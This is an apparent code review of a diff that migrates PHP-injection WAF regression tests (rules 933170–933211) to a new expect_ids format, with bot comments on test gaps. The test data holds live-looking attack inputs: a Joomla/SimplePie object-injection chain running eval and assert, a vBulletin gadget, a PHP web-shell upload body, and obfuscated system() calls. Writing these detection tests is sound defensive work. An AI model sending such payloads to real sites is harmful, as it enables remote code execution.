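Review bot: The disabled test 4 that this hunk re-indents and migrates to `# expect_ids: [933161]` carries a POST body `# data: gethostbynamE(` that has nothing to do with its stated case `dl/*foo*/()` — the same body is the positive payload of 933151's test 4 earlier in this diff. If it is ever re-enabled, the body could satisfy the 933161 expectation on its own (if `gethostbyname` happens to be in this rule's word list — I cannot tell from the diff) and mask whether the comment-interleaved `dl%2F%2Afoo%2A%2F%09%28%29` URI is actually detected. While the block is being touched anyway, drop the `data:` line or make it inert, e.g. `# data: ""`, and note in the new `# See .../issues/3693` comment what the open bypass is so a reader does not need to follow the link to know why a known evasion is untested.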
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml
@@ -17,7 +17,8 @@ tests:
 uri: "/get/serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D"
 version: "HTTP/1.1"
 output:
- log_contains: id "933170"
+ log:
+ expect_ids: [933170]
 - test_id: 2
 desc: PHP object injection
 stages:
@@ -32,7 +33,8 @@ tests:
 uri: "/get/serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D"
 version: "HTTP/1.1"
 output:
- log_contains: id "933170"
+ log:
+ expect_ids: [933170]
 - test_id: 3
 desc: PHP object injection
 stages:
@@ -48,7 +50,8 @@ tests:
 uri: "/post/serialize2"
 version: "HTTP/1.1"
 output:
- log_contains: id "933170"
+ log:
+ expect_ids: [933170]
 - test_id: 4
 desc: PHP object injection
 stages:
@@ -64,7 +67,8 @@ tests:
 uri: "/post/serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D"
 version: "HTTP/1.1"
 output:
- log_contains: id "933170"
+ log:
+ expect_ids: [933170]
 - test_id: 5
 desc: PHP object injection
 stages:
@@ -80,7 +84,8 @@ tests:
 uri: "/post/serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D"
 version: "HTTP/1.1"
 output:
- log_contains: id "933170"
+ log:
+ expect_ids: [933170]
 - test_id: 6
 desc: PHP object injection
 stages:
@@ -96,7 +101,8 @@ tests:
 uri: "/post/serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D"
 version: "HTTP/1.1"
 output:
- log_contains: id "933170"
+ log:
+ expect_ids: [933170]
 - test_id: 7
 desc: PHP object injection
 stages:
@@ -112,7 +118,8 @@ tests:
 uri: "/post/serialize6"
 version: "HTTP/1.1"
 output:
- log_contains: id "933170"
+ log:
+ expect_ids: [933170]
 - test_id: 8
 desc: PHP object injection
 stages:
@@ -128,7 +135,8 @@ tests:
 uri: "/post/serialize7"
 version: "HTTP/1.1"
 output:
- log_contains: id "933170"
+ log:
+ expect_ids: [933170]
 - test_id: 9
 desc: PHP object injection
 stages:
@@ -144,7 +152,8 @@ tests:
 uri: "/post/serialize8"
 version: "HTTP/1.1"
 output:
- log_contains: id "933170"
+ log:
+ expect_ids: [933170]
 - test_id: 10
 desc: PHP object injection
 stages:
@@ -160,4 +169,5 @@ tests:
 uri: "/post/serialize9"
 version: "HTTP/1.1"
 output:
- log_contains: id "933170"
+ log:
+ expect_ids: [933170]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml
index 4e685ebfd..b2f79f0ca 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml
@@ -17,7 +17,8 @@ tests:
 uri: "/get?x="
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933180"
+ log:
+ no_expect_ids: [933180]
 - test_id: 2
 desc: $a(1)
 stages:
@@ -32,7 +33,8 @@ tests:
 data: 'foo=%24a%281%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 3
 desc: $$b(2)
 stages:
@@ -47,7 +49,8 @@ tests:
 data: 'foo=%24%24b%282%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 4
 desc: $_(3)
 stages:
@@ -62,7 +65,8 @@ tests:
 data: 'foo=%24_%283%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 5
 desc: '@$__[o](4)'
 stages:
@@ -77,7 +81,8 @@ tests:
 data: 'foo=%40%24__%5Bo%5D%284%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 6
 desc: $__['o'](5)
 stages:
@@ -92,7 +97,8 @@ tests:
 data: 'foo=%24__%5B%27o%27%5D%285%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 7
 desc: $__[@o](6)
 stages:
@@ -107,7 +113,8 @@ tests:
 data: 'foo=%24__%5B%40o%5D%286%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 8
 desc: $__[$_[1]](7)
 stages:
@@ -122,7 +129,8 @@ tests:
 data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 9
 desc: $__[@$c](8)
 stages:
@@ -137,7 +145,8 @@ tests:
 data: 'foo=%24__%5B%40%24c%5D%288%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 10
 desc: $d['o'](9)
 stages:
@@ -152,7 +161,8 @@ tests:
 data: '%24d%5B%27o%27%5D%289%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 11
 desc: ${@a}(10)
 stages:
@@ -167,7 +177,8 @@ tests:
 data: 'foo=%24%7B%40a%7D%2810%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 12
 desc: ${'a'}(11)
 stages:
@@ -182,7 +193,8 @@ tests:
 uri: "/get?foo=%24%7B%27a%27%7D%2811%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 13
 desc: ${@$b}(12)
 stages:
@@ -197,7 +209,8 @@ tests:
 uri: "/get?x=%24%7B%40%24b%7D%2812%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 14
 desc: ${$s20}['q53b3a6'](13)
 stages:
@@ -212,7 +225,8 @@ tests:
 data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 15
 desc: $GLOBALS['cf908275'](14)
 stages:
@@ -227,7 +241,8 @@ tests:
 data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 16
 desc: $OOO000000{0}(15)
 stages:
@@ -242,7 +257,8 @@ tests:
 data: 'c=%24OOO000000%7B0%7D%2815%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 17
 desc: $OOO0000O0 (16)
 stages:
@@ -257,7 +273,8 @@ tests:
 uri: "/get?x=%24OOO0000O0%20%2816%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 18
 desc: $_aB_4c[5]['d'] /*lol*/ (17)
 stages:
@@ -272,7 +289,8 @@ tests:
 uri: "/get?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 19
 desc: $_aB_4c[@5]/*wat*/[@d] (18)
 stages:
@@ -287,7 +305,8 @@ tests:
 data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 20
 desc: $_aB_4c/*foo*/[@5]/*bar*/[@d]/*baz*/(19)
 stages:
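Review bot: The description of test 19, `$_aB_4c[@5]/*wat*/[@d] (18)`, does not decode to its payload: `data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29'` ends in an empty `()` rather than `(18)`, which breaks the otherwise consistent convention in this file that test N's call carries the literal argument N-1. It is only the human-readable label that is wrong, but these descriptions are what someone triaging a failing test reads first, so align them: either `desc: $_aB_4c[@5]/*wat*/[@d] ()` or change the payload tail to `%20%2818%29`. The rest of the test's input block is outside the hunk.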
@@ -317,7 +337,8 @@ tests:
 uri: "/get?x=%24___%5B%40-_%5D%2820%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 22
 desc: '@$___[@!+_](21)'
 stages:
@@ -332,7 +353,8 @@ tests:
 uri: "/get?x=%40%24___%5B%40%21%2B_%5D%2821%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 23
 desc: $b374k=@$s_func(22)
 stages:
@@ -347,7 +369,8 @@ tests:
 data: 'foo=%24b374k%3D%40%24s_func%2822%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 24
 desc: $function\r\n (23)
 stages:
@@ -362,7 +385,8 @@ tests:
 data: 'foo=%24function%0D%0A%20%2823%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 25
 desc: $__[_](24)
 stages:
@@ -377,7 +401,8 @@ tests:
 uri: "/get?x=%24__%5B_%5D%2824%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 26
 desc: $____[_]{_}[@_](25)
 stages:
@@ -392,7 +417,8 @@ tests:
 uri: "/get?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 27
 desc: multiline with comments
 stages:
@@ -407,7 +433,8 @@ tests:
 data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 28
 desc: $$$z(29)
 stages:
@@ -422,7 +449,8 @@ tests:
 uri: "/get?x=%24%24%24z%2829%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 29
 desc: ${_.__}(30);
 stages:
@@ -437,7 +465,8 @@ tests:
 uri: "/get?x=%24%7B_.__%7D%2830%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 30
 desc: $ {@_.__}(31);
 stages:
@@ -452,7 +481,8 @@ tests:
 uri: "/get?x=%24%20%7B%40_.__%7D%2831%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 31
 desc: $_[@-_]($_[@!+_] )
 stages:
@@ -467,7 +497,8 @@ tests:
 uri: "/get?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 32
 desc: $f(101).$f(120)
 stages:
@@ -482,7 +513,8 @@ tests:
 uri: "/get?x=%24f%28101%29.%24f%28120%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 33
 desc: '@$b374k("foo")'
 stages:
@@ -497,7 +529,8 @@ tests:
 uri: "/get?x=%40%24b374k%28%22foo%22%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 34
 desc: ${$foo->bar}(200)
 stages:
@@ -512,7 +545,8 @@ tests:
 uri: "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 35
 desc: $foo->$funcname()
 stages:
@@ -527,7 +561,8 @@ tests:
 data: '%24foo-%3E%24funcname%28%29'
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
 - test_id: 36
 desc: Foo::$variable()
 stages:
@@ -542,4 +577,5 @@ tests:
 uri: "/get?x=Foo%3A%3A%24variable%28%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933180"
+ log:
+ expect_ids: [933180]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml
index 454d8a0d3..21a4dc9b3 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml
@@ -19,4 +19,5 @@ tests:
 data: 'file_test=<?php%20@eval($_POST["hacker"]);%20?>&submit=1'
 version: HTTP/1.1
 output:
- log_contains: id "933190"
+ log:
+ expect_ids: [933190]
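Review bot: 933190.yaml appears to contain a single positive case — the only hunk starts at line 19 and runs to the end of the file — so the rule has no false-positive guard at all, and the migration to `expect_ids` leaves that gap in place. Rules that key on a `<?php`/`<?` opening tag are exactly the ones that misfire on ordinary XML prologs, so a negative test with `data: 'file_test=<?xml%20version="1.0"%20encoding="UTF-8"?><doc/>&submit=1'` and `no_expect_ids: [933190]` would pin the intended boundary at negligible cost. I am inferring the file's size from the hunk header; if there are further tests above line 19 that already cover this, disregard.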
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml
index 0b84ff9d4..e46e9c1c8 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml
@@ -17,7 +17,8 @@ tests:
 uri: "/get/test.php?file=phar://phpinfo.zip/phpinfo.txt"
 version: HTTP/1.1
 output:
- log_contains: id "933200"
+ log:
+ expect_ids: [933200]
 - test_id: 2
 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.bzip2://)"
 stages:
@@ -32,7 +33,8 @@ tests:
 uri: "/get/test.php?file=compress.bzip2://file.bz2"
 version: HTTP/1.1
 output:
- log_contains: id "933200"
+ log:
+ expect_ids: [933200]
 - test_id: 3
 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.zlib://)"
 stages:
@@ -47,7 +49,8 @@ tests:
 uri: "/get/test.php?file=compress.zlib://http://www.example.com/some_file.gz"
 version: HTTP/1.1
 output:
- log_contains: id "933200"
+ log:
+ expect_ids: [933200]
 - test_id: 4
 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (zip://)"
 stages:
@@ -62,7 +65,8 @@ tests:
 uri: "/get/test.php?file=zip://archive.zip"
 version: HTTP/1.1
 output:
- log_contains: id "933200"
+ log:
+ expect_ids: [933200]
 - test_id: 5
 desc: "Negative test: PHP Injection Attack - Non-existent wrapper scheme (lz77://)"
 stages:
@@ -77,7 +81,8 @@ tests:
 uri: "/get/test.php?file=lz77://some_file.lz"
 version: HTTP/1.1
 output:
- no_log_contains: id "933200"
+ log:
+ no_expect_ids: [933200]
 - test_id: 6
 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.shell://)"
 stages:
@@ -92,7 +97,8 @@ tests:
 uri: "/get/test.php?file=ssh2.shell://user:password@example.com:22/xterm"
 version: HTTP/1.1
 output:
- log_contains: id "933200"
+ log:
+ expect_ids: [933200]
 - test_id: 7
 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.exec://)"
 stages:
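Review bot: Every positive case in this file sends the wrapper scheme in lowercase (`phar://`, `compress.bzip2://`, `zip://`, `ssh2.shell://`), and the one negative case, `lz77://`, only establishes that an unknown scheme is ignored. As far as I recall PHP resolves stream-wrapper names case-insensitively (it retries the lookup with a lowercased scheme), so `PHAR://phpinfo.zip/phpinfo.txt` is just as dangerous as test 1's payload, yet nothing here pins that the rule's transformations cover it; a mixed-case positive such as `uri: "/get/test.php?file=PhAr://phpinfo.zip/phpinfo.txt"` would close that. A negative case with a benign scheme that legitimately appears in query strings (e.g. `file=https://www.example.com/some_file.gz`) would likewise document the intended false-positive boundary — the current negative test does not exercise it.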
@@ -107,7 +113,8 @@ tests:
 uri: "/get/test.php?file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl"
 version: HTTP/1.1
 output:
- log_contains: id "933200"
+ log:
+ expect_ids: [933200]
 - test_id: 8
 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.tunnel://)"
 stages:
@@ -122,7 +129,8 @@ tests:
 uri: "/get/test.php?file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25"
 version: HTTP/1.1
 output:
- log_contains: id "933200"
+ log:
+ expect_ids: [933200]
 - test_id: 9
 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.sftp://)"
 stages:
@@ -137,7 +145,8 @@ tests:
 uri: "/get/test.php?file=ssh2.sftp://user:password@example.com:22/path/to/filename"
 version: HTTP/1.1
 output:
- log_contains: id "933200"
+ log:
+ expect_ids: [933200]
 - test_id: 10
 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.scp://)"
 stages:
@@ -152,4 +161,5 @@ tests:
 uri: "/get/test.php?file=ssh2.scp://user:password@example.com:22/path/to/filename"
 version: HTTP/1.1
 output:
- log_contains: id "933200"
+ log:
+ expect_ids: [933200]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml
index 46ba63c95..74a7285e7 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml
@@ -18,7 +18,8 @@ tests:
 uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29."
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933210"
+ log:
+ no_expect_ids: [933210]
 - test_id: 2
 desc: Check for false positive 2
 stages:
@@ -33,7 +34,8 @@ tests:
 uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933210"
+ log:
+ no_expect_ids: [933210]
 - test_id: 3
 desc: PHP Variable Function bypass "(system)('uname')"
 stages:
@@ -48,7 +50,8 @@ tests:
 uri: "/get?x=%28system%29%28%27uname%27%29%20%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 4
 desc: PHP Variable Function bypass "(sy.(st).em)('uname')"
 stages:
@@ -63,7 +66,8 @@ tests:
 uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 5
 desc: PHP Variable Function bypass "(string)'system'('uname')"
 stages:
@@ -78,7 +82,8 @@ tests:
 uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 6
 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')"
 stages:
@@ -93,7 +98,8 @@ tests:
 uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 7
 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')"
 stages:
@@ -108,7 +114,8 @@ tests:
 uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 8
 desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')"
 stages:
@@ -123,7 +130,8 @@ tests:
 uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 9
 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')"
 stages:
@@ -138,7 +146,8 @@ tests:
 uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 10
 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')"
 stages:
@@ -153,7 +162,8 @@ tests:
 uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 11
 desc: PHP Variable Function bypass "(system)(ls)"
 stages:
@@ -168,7 +178,8 @@ tests:
 uri: "/get?x=%28system%29%28ls%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 12
 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)"
 stages:
@@ -183,7 +194,8 @@ tests:
 uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 13
 desc: PHP Variable Function bypass "[system][0](ls)"
 stages:
@@ -198,7 +210,8 @@ tests:
 uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 14
 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )"
 stages:
@@ -213,7 +226,8 @@ tests:
 uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 15
 desc: PHP Variable Function bypass "(['system'])[0]('uname')"
 stages:
@@ -228,7 +242,8 @@ tests:
 uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 16
 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )"
 stages:
@@ -243,7 +258,8 @@ tests:
 uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 17
 desc: Check FP if Cookie contains '/' (slash)
 stages:
@@ -259,7 +275,8 @@ tests:
 uri: "/get"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933210"
+ log:
+ no_expect_ids: [933210]
 - test_id: 18
 desc: Check FP if Cookie contains '/' (slash)
 stages:
@@ -275,7 +292,8 @@ tests:
 uri: "/get"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933210"
+ log:
+ no_expect_ids: [933210]
 - test_id: 19
 desc: Check FP if text contains quotes and round parenthesis
 stages:
@@ -290,7 +308,8 @@ tests:
 uri: "/get?search=this+is+a+%22dog%22+%28not+a+cat%29"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933210"
+ log:
+ no_expect_ids: [933210]
 - test_id: 20
 desc: Block function call via string
 stages:
@@ -305,7 +324,8 @@ tests:
 uri: "/get?code=%22system%22%28ls%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
 - test_id: 21
 desc: Block function call via string using hex escape sequence
 stages:
@@ -320,4 +340,5 @@ tests:
 uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B"
 version: "HTTP/1.1"
 output:
- log_contains: id "933210"
+ log:
+ expect_ids: [933210]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml
index 0126b067f..5c7d7b8a4 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml
@@ -18,7 +18,8 @@ tests:
 uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29."
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933211"
+ log:
+ no_expect_ids: [933211]
 - test_id: 2
 desc: Check for false positive 2
 stages:
@@ -33,7 +34,8 @@ tests:
 uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933211"
+ log:
+ no_expect_ids: [933211]
 - test_id: 3
 desc: PHP Variable Function bypass "(system)('uname')"
 stages:
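Review bot: Tests 17 and 18 of 933210 carry the identical description `Check FP if Cookie contains '/' (slash)` and the identical request line `uri: "/get"`; whatever distinguishes them lives in the Cookie header, which is outside both hunks, so a reader of the diff cannot tell what each one guards. Descriptions are the only documentation these YAML cases have, so state the variant in each, e.g. `desc: Check FP if Cookie value contains a single '/' (slash)` for one and the specific placement (leading, trailing, multiple) the other exercises. If the two headers really are the same, one of the tests is redundant and should go.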
@@ -48,7 +50,8 @@ tests: uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 4 desc: PHP Variable Function bypass "(sy.(st).em)('uname')" stages: @@ -63,7 +66,8 @@ tests: uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: @@ -78,7 +82,8 @@ tests: uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: @@ -93,7 +98,8 @@ tests: uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: @@ -108,7 +114,8 @@ tests: uri: 